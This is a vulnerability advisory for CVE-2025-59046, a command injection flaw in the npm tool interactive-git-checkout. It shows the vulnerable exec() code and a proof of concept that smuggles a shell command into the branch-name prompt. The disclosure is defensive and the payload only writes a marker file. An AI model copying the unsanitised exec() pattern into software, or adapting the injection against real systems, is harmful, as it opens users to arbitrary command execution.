CVE-2025-59046
interactive-git-checkout has a Command Injection vulnerability
Description
The npm package `interactive-git-checkout` is an interactive command-line tool that allows users to checkout a git branch while it prompts for the branch name on the command-line. It is available as an npm package and can be installed via `npm install -g interactive-git-checkout`. Resources: * Project's npm package: https://www.npmjs.com/package/interactive-git-checkout ## Command Injection Vulnerability The `interactive-git-checkout` tool is vulnerable to a command injection vulnerability because it passes the branch name to the `git checkout` command using the Node.js child process module's `exec()` function without proper input validation or sanitization. The following vulnerable code snippets demonstrates the issue: ```js const { exec: execCb } = require('child_process'); const { promisify } = require('util'); const exec = promisify(execCb); module.exports = async (targetBranch) => { const { stdout, stderr } = await exec(`git checkout ${targetBranch}`); process.stderr.write(stderr); process.stdout.write(stdout); }; ``` ## Exploit Proof of Concept 1. Install the `interactive-git-checkout` package (as suggested by the package's README): ```bash npm install --global interactive-git-checkout ``` 2. Run the executable exposed by the installed package: ```bash $ igc ``` 3. When prompted, enter the following branch name: ```bash hello ; echo 'Command Injection Vulnerability Exploited!' > /tmp/command-injection.txt; # ``` ## Vulnerable versions All versions of interactive-git-checkout are vulnerable to this issue, up to and including to the latest version of `1.1.4`. # Author Liran Tal
How to fix CVE-2025-59046
No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.
- —no fix listed
Is CVE-2025-59046 being exploited?
Low — EPSS is 0.5%, meaning exploitation activity has not been observed at scale.